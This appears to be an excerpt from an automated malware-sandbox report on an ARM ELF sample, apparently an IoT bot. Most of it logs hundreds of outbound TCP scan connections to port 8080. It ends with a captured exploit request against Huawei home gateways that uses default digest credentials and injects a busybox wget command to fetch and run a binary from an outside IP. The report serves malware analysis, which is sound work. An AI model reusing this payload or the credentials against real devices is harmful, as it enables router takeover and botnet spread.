          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.242.216.22:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.123.236.126:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.169.53.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.14.213.132:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.239.185.57:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.139.34.205:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.54.160.145:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.123.216.106:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.129.82.47:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.71.55.33:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.49.252.165:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.52.164.171:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.104.103.70:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.183.204.163:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.156.173.150:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.196.50.26:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.49.80.53:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.107.145.26:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.6.15.37:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.228.196.14:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.151.72.242:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.103.83.127:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.12.241.94:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.173.118.185:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.146.214.165:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.29.249.253:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.216.124.123:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.143.89.112:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.52.152.36:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.115.136.223:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.194.76.116:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.2.148.182:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.169.253.180:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.128.245.114:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.149.16.23:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.103.75.10:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.164.12.33:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.0.212.115:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.255.131.229:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.205.138.173:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.123.246.74:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.126.192.194:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.178.172.219:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.4.62.68:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.224.86.140:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.226.214.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.24.177.89:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.26.83.199:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.115.164.105:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.129.18.24:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.205.207.121:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.125.147.125:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.156.70.71:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.222.219.110:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.243.74.135:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.252.123.45:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.37.98.221:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.87.174.28:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.62.114.189:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.162.130.123:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.21.247.206:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.58.211.227:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.114.247.57:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.17.27.35:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.247.129.27:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.55.103.34:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.63.85.161:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.109.35.125:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.231.161.240:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.139.143.159:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.188.1.142:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.245.248.63:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.0.231.180:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.63.129.108:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.65.191.48:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.89.131.139:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.199.66.193:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.83.28.208:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.117.169.53:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.191.173.231:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.204.253.104:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.24.253.16:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.160.252.189:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.148.86.47:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.135.18.93:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.11.80.118:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.177.132.42:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.205.172.65:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.215.96.168:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.134.40.175:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.245.93.165:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.156.92.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.112.203.111:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.238.229.144:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.121.59.208:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.243.210.195:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.16.130.30:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.79.104.49:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.32.73.169:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.69.4.247:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.245.145.130:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.167.250.241:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.90.154.35:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.24.19.79:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.35.219.69:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.81.40.213:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.121.187.194:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.11.10.112:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.200.222.67:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.10.86.124:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.154.159.141:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.229.189.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.81.137.2:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.171.245.240:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.170.82.220:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.144.216.30:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.85.35.70:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.28.241.150:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.144.97.97:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.179.151.89:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.170.193.111:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.242.38.126:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.65.128.29:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.111.220.185:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.227.241.243:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.134.178.155:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.70.127.20:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.84.227.192:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.78.19.181:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.85.227.197:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.197.213.111:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.213.163.51:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.217.202.97:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.142.43.107:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.16.229.88:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.208.1.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.178.107.190:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.128.92.123:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.253.192.88:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.106.69.244:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.139.71.84:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.197.250.64:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.122.36.90:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.211.229.133:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.200.189.119:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.42.5.93:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.124.44.104:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.52.29.40:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.3.68.245:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.51.239.165:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.71.90.241:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.43.253.107:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.35.155.3:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.240.73.76:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.56.0.165:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.197.228.219:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.174.110.109:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.167.95.111:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.244.25.180:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.178.99.242:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.242.139.145:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.85.73.155:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.17.59.222:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.122.8.72:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.195.243.64:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.0.72.66:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.75.160.64:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.117.226.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.235.72.152:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.44.255.88:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.124.126.224:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.235.185.121:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.73.79.13:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.95.112.208:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.117.39.80:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.32.203.174:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.3.190.226:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.59.150.166:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.247.76.151:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.7.28.174:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.223.174.119:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.21.101.205:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.28.192.222:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.66.156.142:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.185.9.117:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.5.31.192:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.27.63.112:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.8.93.120:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.160.45.51:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.234.249.5:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.110.44.224:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.248.61.92:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.101.83.226:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.77.107.185:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.203.231.28:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.176.246.191:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.167.159.158:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.163.72.2:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.192.180.74:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.120.55.168:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.123.97.166:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.147.85.63:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.200.8.39:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.40.70.165:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.0.9.196:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.181.79.225:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.160.6.195:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.137.190.98:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.41.166.132:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.14.93.49:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.187.224.104:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.59.90.247:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.98.66.53:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.183.199.15:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.124.162.192:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.85.156.69:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.160.70.79:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.12.168.18:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.50.248.138:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.84.92.244:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.21.112.140:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.197.60.105:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.17.61.129:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.86.2.233:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.32.221.181:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.166.68.114:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.37.189.219:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.214.112.3:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.155.228.155:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.100.243.89:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.135.198.221:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.133.217.212:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.98.97.144:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.253.183.221:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.240.52.109:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.25.47.107:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.190.54.91:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.242.220.246:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.182.249.0:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.178.173.235:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.17.109.194:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.168.149.51:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.108.9.197:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.0.96.185:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.117.171.60:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.198.170.255:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.176.178.88:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.135.20.239:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.177.153.106:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.174.222.172:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.108.70.189:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.14.43.160:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.142.149.108:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.63.191.131:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.53.42.83:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.82.184.135:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.9.249.221:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.18.133.222:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.145.249.89:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.171.76.237:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.25.169.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.156.105.193:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.50.246.216:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.12.110.41:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.137.140.153:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.199.165.199:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.237.24.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.134.32.182:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.103.90.137:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.142.44.240:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.238.76.197:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.188.254.69:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.96.232.214:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.166.102.207:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.201.236.48:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.77.28.154:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.225.150.25:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.158.254.114:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.117.68.20:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.53.83.181:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.245.37.181:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.29.188.252:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.47.179.168:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.237.228.142:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.195.148.18:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.238.50.170:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.67.124.200:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.218.246.75:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.157.138.93:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.119.124.231:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.148.185.154:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.230.208.153:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.187.36.136:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.254.150.207:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.91.212.138:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.178.149.1:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.90.51.227:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.59.21.152:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.224.98.43:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.154.194.2:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.126.98.201:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.250.52.191:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.186.143.193:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.234.8.142:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.242.52.54:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.111.49.229:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.206.140.193:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.184.101.130:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.138.121.171:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.81.209.218:8080
          Source: /tmp/mods.arm7.elf (PID: 6206)Socket: 127.0.0.1::23455Jump to behavior
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.5 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
